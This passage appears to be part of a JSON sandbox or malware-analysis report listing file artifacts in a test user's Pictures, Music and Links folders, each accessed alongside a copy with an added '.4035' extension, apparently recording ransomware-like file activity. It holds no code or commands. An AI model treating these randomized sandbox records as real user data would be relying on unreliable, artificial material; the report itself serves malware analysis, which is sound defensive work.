1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\EuOR.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\euor.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\hP6 M97OYvSDIf9gVg.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\hp6 m97oyvsdif9gvg.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\hP6 M97OYvSDIf9gVg.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\hp6 m97oyvsdif9gvg.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\L4NdGUY34ih.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\l4ndguy34ih.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\L4NdGUY34ih.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\l4ndguy34ih.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\l5I02B2iyCeNnq.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\l5i02b2iycennq.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\l5I02B2iyCeNnq.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\l5i02b2iycennq.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\LGe1Fh5Wpy.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\lge1fh5wpy.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\LGe1Fh5Wpy.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\lge1fh5wpy.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\O4AeQaMpJ.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\o4aeqampj.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\O4AeQaMpJ.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\o4aeqampj.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\Pi8Yz0Gz9vOf3GFN4IPA.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\pi8yz0gz9vof3gfn4ipa.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\Pi8Yz0Gz9vOf3GFN4IPA.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\pi8yz0gz9vof3gfn4ipa.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\PUM C5 EO8GuRvQsK Q.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\pum c5 eo8gurvqsk q.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\PUM C5 EO8GuRvQsK Q.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\pum c5 eo8gurvqsk q.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\rPPTHo8.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\rpptho8.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\rPPTHo8.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\rpptho8.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\s9Nds2xUYNwEt _S-wO.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\s9nds2xuynwet _s-wo.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\s9Nds2xUYNwEt _S-wO.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\s9nds2xuynwet _s-wo.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\sgHYdeAqpOmbl.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\sghydeaqpombl.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\sgHYdeAqpOmbl.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\sghydeaqpombl.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\SVECNQz.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\svecnqz.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\SVECNQz.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\svecnqz.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\U5G0d.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\u5g0d.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\U5G0d.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\u5g0d.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\urdg 07FE.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\urdg 07fe.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\urdg 07FE.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\urdg 07fe.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\XiYf9-9V196.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\xiyf9-9v196.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Pictures\\w7S1sef\\XiYf9-9V196.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\xiyf9-9v196.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\C-i8QaJluhn9gm.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\c-i8qajluhn9gm.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\C-i8QaJluhn9gm.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\c-i8qajluhn9gm.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\ckT7-AE.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\ckt7-ae.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\ckT7-AE.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\ckt7-ae.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\EWZkiKK.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\ewzkikk.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\EWZkiKK.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\ewzkikk.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\kfX_hFl afgz CCphF6M.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\kfx_hfl afgz ccphf6m.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\kfX_hFl afgz CCphF6M.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\kfx_hfl afgz ccphf6m.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\L AqupJXv.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\l aqupjxv.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\L AqupJXv.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\l aqupjxv.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\NibX.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\nibx.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\NibX.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\nibx.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\pyQu8BmB KNqlRuQe.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\pyqu8bmb knqlruqe.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\pyQu8BmB KNqlRuQe.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\pyqu8bmb knqlruqe.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\r3O1jCzIvgS-.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\r3o1jczivgs-.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\r3O1jCzIvgS-.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\r3o1jczivgs-.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\rOdnZPK7V.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\rodnzpk7v.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\rOdnZPK7V.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\rodnzpk7v.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\RtsLtclt.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\rtsltclt.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\RtsLtclt.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\rtsltclt.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\vAF0ydk gO1dF_Z.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\vaf0ydk go1df_z.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\vAF0ydk gO1dF_Z.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\vaf0ydk go1df_z.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\VTfTWsBPNzMHn.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\vtftwsbpnzmhn.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\VTfTWsBPNzMHn.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\vtftwsbpnzmhn.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\zbcik6OtmH-.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\zbcik6otmh-.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\zbcik6OtmH-.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\zbcik6otmh-.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\2DYiy8BvC1.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\2dyiy8bvc1.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\2DYiy8BvC1.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\2dyiy8bvc1.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\754eV 9 H9g6gb.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\754ev 9 h9g6gb.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\754eV 9 H9g6gb.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\754ev 9 h9g6gb.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\9tb-tPFVOb2uj9R.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\9tb-tpfvob2uj9r.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\9tb-tPFVOb2uj9R.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\9tb-tpfvob2uj9r.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\gNAwN.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\gnawn.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\gNAwN.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\gnawn.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\I6Hp4-HY MkwGzm.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\i6hp4-hy mkwgzm.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\I6Hp4-HY MkwGzm.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\i6hp4-hy mkwgzm.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\Ia lSGWjh6c5U0B H.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\ia lsgwjh6c5u0b h.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\Ia lSGWjh6c5U0B H.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\ia lsgwjh6c5u0b h.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\jIUn.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\jiun.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\jIUn.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\jiun.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\kS2_r71.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\ks2_r71.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\kS2_r71.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\ks2_r71.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\L36FytEnJl.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\l36fytenjl.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\L36FytEnJl.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\l36fytenjl.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\lLAOaa6e1cVocJ6VP.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\llaoaa6e1cvocj6vp.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\lLAOaa6e1cVocJ6VP.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\llaoaa6e1cvocj6vp.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\lPaNijrRt6q-RoAj m50.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\lpanijrrt6q-roaj m50.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\lPaNijrRt6q-RoAj m50.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\lpanijrrt6q-roaj m50.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\LQuKOV.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\lqukov.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\LQuKOV.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\lqukov.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\RU6bNn.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\ru6bnn.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\RU6bNn.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\ru6bnn.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\Tf4wrU.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\tf4wru.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\Tf4wrU.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\tf4wru.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\z4nKiw5qLW-1.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\z4nkiw5qlw-1.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Music\\PoiBG_Ey7M-NcYKD\\z4nKiw5qLW-1.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\z4nkiw5qlw-1.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\Desktop.lnk.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\desktop.lnk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\Desktop.lnk", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\desktop.lnk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Links\\Downloads.lnk.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\downloads.lnk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 